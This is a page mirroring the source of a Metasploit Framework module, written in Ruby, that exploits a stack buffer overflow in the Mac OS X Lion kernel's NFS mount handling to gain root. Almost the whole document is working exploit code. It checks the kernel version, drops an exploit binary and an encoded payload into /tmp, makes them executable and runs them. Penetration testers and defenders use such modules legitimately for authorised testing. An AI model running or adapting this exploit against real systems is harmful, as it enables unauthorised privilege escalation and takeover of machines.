Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/nfs_mount_root.rb
32587 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::FileDropper

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Mac OS X NFS Mount Privilege Escalation Exploit',

19
        'Description' => %q{

20
          This exploit leverages a stack buffer overflow vulnerability to escalate privileges.

21
          The vulnerable function nfs_convert_old_nfs_args does not verify the size

22
          of a user-provided argument before copying it to the stack. As a result, by

23
          passing a large size as an argument, a local user can overwrite the stack with arbitrary

24
          content.

25


26
          Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Kenzley Alphonse', # discovery and a very well-written exploit

31
          'joev' # msf module

32
        ],

33
        'References' => [

34
          [ 'EDB', '32813' ]

35
        ],

36
        'Platform' => 'osx',

37
        'SessionTypes' => [ 'shell', 'meterpreter' ],

38
        'Targets' => [

39
          [

40
            'Mac OS X 10.7 Lion x64 (Native Payload)',

41
            {

42
              'Platform' => 'osx',

43
              'Arch' => ARCH_X64

44
            }

45
          ]

46
        ],

47
        'DefaultTarget' => 0,

48
        'DisclosureDate' => '2014-04-11',

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56
  end

57


58
  def check

59
    if ver_lt(xnu_ver, '1699.32.7') and xnu_ver.strip != '1699.24.8'

60
      CheckCode::Appears

61
    else

62
      CheckCode::Safe

63
    end

64
  end

65


66
  def exploit

67
    if is_root?

68
      fail_with Failure::BadConfig, 'Session already has root privileges'

69
    end

70


71
    if check != CheckCode::Appears

72
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

73
    end

74


75
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')

76
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')

77
    exploit = File.read(file)

78
    pload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

79
    tmpfile = "/tmp/#{Rex::Text.rand_text_alpha_lower(12)}"

80
    payloadfile = "/tmp/#{Rex::Text.rand_text_alpha_lower(12)}"

81


82
    print_status "Writing temp file as '#{tmpfile}'"

83
    write_file(tmpfile, exploit)

84
    register_file_for_cleanup(tmpfile)

85


86
    print_status "Writing payload file as '#{payloadfile}'"

87
    write_file(payloadfile, pload)

88
    register_file_for_cleanup(payloadfile)

89


90
    print_status 'Executing payload...'

91
    cmd_exec("chmod +x #{tmpfile}")

92
    cmd_exec("chmod +x #{payloadfile}")

93
    cmd_exec("#{tmpfile} #{payloadfile}")

94
  end

95


96
  def xnu_ver

97
    m = cmd_exec('uname -a').match(/xnu-([0-9.~]*)/)

98
    m && m[1]

99
  end

100


101
  def ver_lt(a, b)

102
    Rex::Version.new(a.gsub(/~.*?$/, '')) < Rex::Version.new(b.gsub(/~.*?$/, ''))

103
  end

104
end

105


106